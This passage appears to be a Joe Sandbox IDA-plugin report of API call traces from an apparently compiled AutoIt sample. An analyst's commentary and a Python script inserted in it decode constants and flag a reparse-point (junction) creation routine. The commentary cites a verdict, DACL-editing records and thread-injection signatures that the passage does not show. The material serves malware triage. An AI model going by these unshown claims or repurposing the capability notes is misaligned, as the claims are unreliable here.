                                            • Opcode ID: a8888213356c8803a27733036ef1027d6dc35c5838666eb365a47a4c4fb2660b
                                            • Instruction ID: ea79edc34e2b1ef91b0544c511f384ad12fc0c1e7a4b758cca96595c70a582d3
                                            • Opcode Fuzzy Hash: a8888213356c8803a27733036ef1027d6dc35c5838666eb365a47a4c4fb2660b
                                            • Instruction Fuzzy Hash: F81256715083459BC764EF28C891AAEBBE4FF98314F40491EF589D32A2DB30DA49DB53
                                            APIs
                                            • _memset.LIBCMT ref: 0086CEFB
                                            • DestroyWindow.USER32(?,?), ref: 0086CF73
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0086CFF4
                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0086D016
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0086D025
                                            • DestroyWindow.USER32(?), ref: 0086D042
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00800000,00000000), ref: 0086D075
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0086D094
                                            • GetDesktopWindow.USER32 ref: 0086D0A9
                                            • GetWindowRect.USER32(00000000), ref: 0086D0B0
                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0086D0C2
                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0086D0DA
                                              • Part of subcall function 0081B526: GetWindowLongW.USER32(?,000000EB), ref: 0081B537
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                            • String ID: 0$tooltips_class32
                                            • API String ID: 3877571568-3619404913
                                            • Opcode ID: f19c084dbe82e65df0ae02771765ab42f4acf7622c03544aa4ddf17b18d574d5
                                            • Instruction ID: c1e228a0a67e39744e83d16a2cb0e601549e07066bdb6fb2c81c454915db4d29
                                            • Opcode Fuzzy Hash: f19c084dbe82e65df0ae02771765ab42f4acf7622c03544aa4ddf17b18d574d5
                                            • Instruction Fuzzy Hash: 477199B0640305AFEB20CF28DC85FA67BE5FB89708F094519F985C72A1D770E942CB62
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • DragQueryPoint.SHELL32(?,?), ref: 0086F37A
                                              • Part of subcall function 0086D7DE: ClientToScreen.USER32(?,?), ref: 0086D807
                                              • Part of subcall function 0086D7DE: GetWindowRect.USER32(?,?), ref: 0086D87D
                                              • Part of subcall function 0086D7DE: PtInRect.USER32(?,?,0086ED5A), ref: 0086D88D
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0086F3E3
                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0086F3EE
                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0086F411
                                            • _wcscat.LIBCMT ref: 0086F441
                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0086F458
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0086F471
                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0086F488
                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0086F4AA
                                            • DragFinish.SHELL32(?), ref: 0086F4B1
                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0086F59C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                            • API String ID: 169749273-3440237614
                                            • Opcode ID: d4d2b0e0e64b65aed230f4ef2b62adab46f55a08fc9776c3d1e90febce3f33dd
                                            • Instruction ID: f56fe1218fde0bbeeb5680b22d5f0b828b3641df989a10f643fb4cd5c9a7b371
                                            • Opcode Fuzzy Hash: d4d2b0e0e64b65aed230f4ef2b62adab46f55a08fc9776c3d1e90febce3f33dd
                                            • Instruction Fuzzy Hash: 56613B71108304AFC701EF68DC85D9BBBF8FF99714F000A1EB695962A2DB719A09CB52
                                            APIs
                                            • VariantInit.OLEAUT32(00000000), ref: 0084AB3D
                                            • VariantCopy.OLEAUT32(?,?), ref: 0084AB46
                                            • VariantClear.OLEAUT32(?), ref: 0084AB52
                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0084AC40
                                            • __swprintf.LIBCMT ref: 0084AC70
                                            • VarR8FromDec.OLEAUT32(?,?), ref: 0084AC9C
                                            • VariantInit.OLEAUT32(?), ref: 0084AD4D
                                            • SysFreeString.OLEAUT32(00000016), ref: 0084ADDF
                                            • VariantClear.OLEAUT32(?), ref: 0084AE35
                                            • VariantClear.OLEAUT32(?), ref: 0084AE44
                                            • VariantInit.OLEAUT32(00000000), ref: 0084AE80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                            • API String ID: 3730832054-3931177956
                                            • Opcode ID: 5ae294fa305cbc56bbb165484983e15f292ab917e4dfd948d4ff4d43e4f3062d
                                            • Instruction ID: 114459109e534c54c92ac85e627184c63e13b0dddf4337035211887033300181
                                            • Opcode Fuzzy Hash: 5ae294fa305cbc56bbb165484983e15f292ab917e4dfd948d4ff4d43e4f3062d
                                            • Instruction Fuzzy Hash: 5DD1EB71A4021DEBDB289F69C884BAEB7B9FF04720F148455E415DF281DB34E880DBA3
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 008671FC
                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00867247
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharMessageSendUpper
                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                            • API String ID: 3974292440-4258414348
                                            • Opcode ID: 8e35d2696cd5872a180e9111ae23f445947d5d1edb02c5618b12b1bc04dd34f1
                                            • Instruction ID: 3a1f5072ae32e1145109786dca02c8caf62dae1f5668ba6dcda49aee88f8fa96
                                            • Opcode Fuzzy Hash: 8e35d2696cd5872a180e9111ae23f445947d5d1edb02c5618b12b1bc04dd34f1
                                            • Instruction Fuzzy Hash: 7B9141702046059BCB04EF18C951AAEB7A5FF94314F015859F996EB3A3DB30ED4ACBC2
                                            APIs
                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0086E5AB
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0086BEAF), ref: 0086E607
                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0086E647
                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0086E68C
                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0086E6C3
                                            • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0086BEAF), ref: 0086E6CF
                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0086E6DF
                                            • DestroyIcon.USER32(?,?,?,?,?,0086BEAF), ref: 0086E6EE
                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0086E70B
                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0086E717
                                              • Part of subcall function 00820FA7: __wcsicmp_l.LIBCMT ref: 00821030
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                            • String ID: .dll$.exe$.icl
                                            • API String ID: 1212759294-1154884017
                                            • Opcode ID: 3ea5ee31ea5b5246c16fc8162d5de2a46b184d91b05aa3c0b3909c17f447882d
                                            • Instruction ID: b823bc95f6f8cf0e073b3620aafb181e86e6d69a69ee945e0738d06f685a4167
                                            • Opcode Fuzzy Hash: 3ea5ee31ea5b5246c16fc8162d5de2a46b184d91b05aa3c0b3909c17f447882d
                                            • Instruction Fuzzy Hash: 74619EB1540319BAEB24DF68DC46FBE7BA8FB18724F104115F915EA1D1EB74A980CBA0
                                            APIs
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • CharLowerBuffW.USER32(?,?), ref: 0084D292
                                            • GetDriveTypeW.KERNEL32 ref: 0084D2DF
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0084D327
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0084D35E
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0084D38C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                            • API String ID: 1148790751-4113822522
                                            • Opcode ID: 2575f9b7bdf05f08e4ed45a39bfdedad71478bf7f42e1ff159817d2cb2f16c39
                                            • Instruction ID: 52ac53292813c45598bea1c65c5bb543e653deda1f6199d38a1f3781303242f2
                                            • Opcode Fuzzy Hash: 2575f9b7bdf05f08e4ed45a39bfdedad71478bf7f42e1ff159817d2cb2f16c39
                                            • Instruction Fuzzy Hash: 01512B711047059FC740EF14C8919AAB7E8FF98758F10495DF899A73A1DB31EE05CB92
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00873973,00000016,0000138C,00000016,?,00000016,0089DDB4,00000000,?), ref: 008426F1
                                            • LoadStringW.USER32(00000000,?,00873973,00000016), ref: 008426FA
                                            • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00873973,00000016,0000138C,00000016,?,00000016,0089DDB4,00000000,?,00000016), ref: 0084271C
                                            • LoadStringW.USER32(00000000,?,00873973,00000016), ref: 0084271F
                                            • __swprintf.LIBCMT ref: 0084276F
                                            • __swprintf.LIBCMT ref: 00842780
                                            • _wprintf.LIBCMT ref: 00842829
                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00842840
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                            • API String ID: 618562835-2268648507
                                            • Opcode ID: 209fa8662fed6395b977def35b896de96a7ae29a81e74e559dacaf6d8ac64183
                                            • Instruction ID: 77b818dfbbdf9b4f04643adbd819441a5e88b9e64d4744cc4c0e76e6fbfae586
                                            • Opcode Fuzzy Hash: 209fa8662fed6395b977def35b896de96a7ae29a81e74e559dacaf6d8ac64183
                                            • Instruction Fuzzy Hash: CD411B72800218AACB54FBE8DD96DEEB778FF18340F500165B501F21D2EA646F59CBA2
                                            APIs
                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0084D0D8
                                            • __swprintf.LIBCMT ref: 0084D0FA
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0084D137
                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0084D15C
                                            • _memset.LIBCMT ref: 0084D17B
                                            • _wcsncpy.LIBCMT ref: 0084D1B7
                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0084D1EC
                                            • CloseHandle.KERNEL32(00000000), ref: 0084D1F7
                                            • RemoveDirectoryW.KERNEL32(?), ref: 0084D200
                                            • CloseHandle.KERNEL32(00000000), ref: 0084D20A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                            • String ID: :$\$\??\%s
                                            • API String ID: 2733774712-3457252023
                                            • Opcode ID: 938cddc144a791e6a8d34adfe009a9fea7ca844b8f57b75e4cebb1e8a8341fc1
                                            • Instruction ID: b8cb73f0e9f9e4627f02f3546c417c836daed73033e76d3ad99bab9536723153
                                            • Opcode Fuzzy Hash: 938cddc144a791e6a8d34adfe009a9fea7ca844b8f57b75e4cebb1e8a8341fc1
                                            • Instruction Fuzzy Hash: 5E3183B2500219ABDB21DFA4DC49FEB77BCFF89740F1040B6F909D21A1E770A6458B25
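The record above is the one in this section worth a second look: the control code 0x000900A4 passed to DeviceIoControl is FSCTL_SET_REPARSE_POINT, the handle it is used on comes from a CreateFileW with GENERIC_WRITE and flags 0x02200000 (FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, the combination needed to open a directory for reparse-point writes), and the "\??\%s" format string is the NT-path form a mount-point reparse buffer carries. Together they are a junction/symlink-creation routine, consistent with the AutoIt runtime's NTFS link helper given the "compiled AutoIt script" verdict above (that attribution is an assumption; the report does not name the function). Decoding such constants by hand across hundreds of records is tedious, so the following script, an added example that is not part of the report or of Joe Security's tooling, parses trace lines in the plugin's format, annotates the constants it knows from the Windows SDK headers, and emits a capability finding when the reparse-point IOCTL appears. The sample lines are constructed by copying records from this section; the constant tables are deliberately small and can be extended.

```python
"""Annotate API-trace lines in the form Joe Sandbox's IDA plugin prints them
('Func.MODULE(arg,arg,...), ref: ADDR'), decoding numeric constants an analyst
would otherwise look up by hand. Added example, not code from the report or
from Joe Security; SAMPLE_LINES are constructed by copying records above, and
the constant names come from the Windows SDK headers."""
import re

# Function and module are mandatory; the argument list is optional because
# CRT calls are printed without one (e.g. '_wcscat.LIBCMT ref: 0086F441').
LINE_RE = re.compile(
    r"(?P<func>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Windows SDK constants: winioctl.h, winnt.h, fileapi.h, winuser.h, commctrl.h.
KNOWN_FSCTL = {0x900A4: "FSCTL_SET_REPARSE_POINT"}
CREATEFILE_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
CREATEFILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
                    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT"}
CREATEFILE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                          4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MESSAGEBOX_FLAGS = {0x10: "MB_ICONHAND", 0x1000: "MB_SYSTEMMODAL",
                    0x10000: "MB_SETFOREGROUND"}
WINDOW_MESSAGES = {0xB0: "EM_GETSEL", 0xB1: "EM_SETSEL", 0xC2: "EM_REPLACESEL",
                   0x111: "WM_COMMAND", 0x170: "STM_SETICON", 0x172: "STM_SETIMAGE",
                   0x233: "WM_DROPFILES", 0x1105: "TVM_GETCOUNT"}


def parse_arg(tok):
    """Hex argument as the plugin prints it; '?' means the value was not recovered."""
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return -int(tok[1:], 16) if tok.startswith("-") else int(tok, 16)


def parse_line(line):
    """One trace line -> {func, mod, args, ref}, or None if it is not a call line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    args = [] if m["args"] is None else [parse_arg(a) for a in m["args"].split(",")]
    return {"func": m["func"], "mod": m["mod"], "args": args, "ref": int(m["ref"], 16)}


def decode_ioctl(code):
    """Split a CTL_CODE() value into its device/function/method/access fields."""
    return {"device": code >> 16, "function": (code >> 2) & 0xFFF,
            "method": code & 3, "access": (code >> 14) & 3}


def decode_flags(value, table):
    """Name the known bits of a flag word; leftover bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def fmt(value, table):
    return "?" if value is None else decode_flags(value, table)


def annotate(rec):
    """Human-readable note for the calls whose constants matter in triage."""
    f, a = rec["func"], rec["args"]
    if f == "DeviceIoControl" and len(a) > 1 and a[1] is not None:
        p = decode_ioctl(a[1])
        return (f"IOCTL {a[1]:#x} = {KNOWN_FSCTL.get(a[1], 'unknown')} (device {p['device']}, "
                f"function {p['function']}, method {p['method']}, access {p['access']})")
    if f == "CreateFileW" and len(a) >= 6:
        return (f"access={fmt(a[1], CREATEFILE_ACCESS)} "
                f"disposition={CREATEFILE_DISPOSITION.get(a[4], '?')} "
                f"flags={fmt(a[5], CREATEFILE_FLAGS)}")
    if f == "MessageBoxW" and len(a) >= 4:
        return f"uType={fmt(a[3], MESSAGEBOX_FLAGS)}"
    if f in ("SendMessageW", "PostMessageW", "DefDlgProcW") and len(a) > 1 \
            and a[1] in WINDOW_MESSAGES:
        return f"msg={WINDOW_MESSAGES[a[1]]}"
    return None


def triage(lines):
    """Per-call notes plus coarse capability findings for a set of trace lines."""
    notes, findings = [], set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        note = annotate(rec)
        if note:
            notes.append(f"{rec['func']} @ {rec['ref']:08X}: {note}")
        if rec["func"] == "DeviceIoControl" and len(rec["args"]) > 1 \
                and rec["args"][1] in KNOWN_FSCTL:
            findings.add("sets NTFS reparse points (junction/symlink creation)")
    return {"notes": notes, "findings": sorted(findings)}


# Constructed input: lines copied from the records in this section.
SAMPLE_LINES = [
    "• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0084D15C",
    "• _wcsncpy.LIBCMT ref: 0084D1B7",
    "• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0084D1EC",
    "• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00842840",
    "• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0086F59C",
]

if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    print("\n".join(result["notes"]))
    print("findings:", result["findings"])
```

Feed it the whole "APIs" section of a report rather than five lines and the findings set is where to grow it: the DACL-editing record further down (GetSecurityDescriptorDacl, AddAce, SetUserObjectSecurity) and the thread-injection signatures listed in the overview are the natural next entries, each keyed on a function name plus the constant that disambiguates it.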
                                            APIs
                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0086BEF4,?,?), ref: 0086E754
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E76B
                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E776
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E783
                                            • GlobalLock.KERNEL32(00000000), ref: 0086E78C
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E79B
                                            • GlobalUnlock.KERNEL32(00000000), ref: 0086E7A4
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E7AB
                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E7BC
                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0088D9BC,?), ref: 0086E7D5
                                            • GlobalFree.KERNEL32(00000000), ref: 0086E7E5
                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0086E809
                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0086E834
                                            • DeleteObject.GDI32(00000000), ref: 0086E85C
                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0086E872
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                            • String ID:
                                            • API String ID: 3840717409-0
                                            • Opcode ID: 6855718be950daee3f259ade430583105516e56464309a62d9a364c83f1112e8
                                            • Instruction ID: 64e58998a926e696d36ff77ec615c476d447c41fef45819e057007130a2d3c90
                                            • Opcode Fuzzy Hash: 6855718be950daee3f259ade430583105516e56464309a62d9a364c83f1112e8
                                            • Instruction Fuzzy Hash: 76413A75600308EFDB119F69DC88EAA7BB9FF89725F104068F905D72A0D770AD41DB60
                                            APIs
                                            • __wsplitpath.LIBCMT ref: 0085076F
                                            • _wcscat.LIBCMT ref: 00850787
                                            • _wcscat.LIBCMT ref: 00850799
                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008507AE
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008507C2
                                            • GetFileAttributesW.KERNEL32(?), ref: 008507DA
                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 008507F4
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00850806
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                            • String ID: *.*
                                            • API String ID: 34673085-438819550
                                            • Opcode ID: 5d785531a7ec4fe6de3c4d4d85f3171ac668175e51d9c611cc671d7dd49d4c42
                                            • Instruction ID: 8486b7cfc90390f9435bb9916d0998d04b91e172b394fdf01d7936c12751782e
                                            • Opcode Fuzzy Hash: 5d785531a7ec4fe6de3c4d4d85f3171ac668175e51d9c611cc671d7dd49d4c42
                                            • Instruction Fuzzy Hash: 53817F715043059FCB24DF68C8459AAB7E8FF98315F14882EFC89D7251EB34E9588F92
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0086EF3B
                                            • GetFocus.USER32 ref: 0086EF4B
                                            • GetDlgCtrlID.USER32(00000000), ref: 0086EF56
                                            • _memset.LIBCMT ref: 0086F081
                                            • GetMenuItemInfoW.USER32 ref: 0086F0AC
                                            • GetMenuItemCount.USER32(00000000), ref: 0086F0CC
                                            • GetMenuItemID.USER32(?,00000000), ref: 0086F0DF
                                            • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0086F113
                                            • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0086F15B
                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0086F193
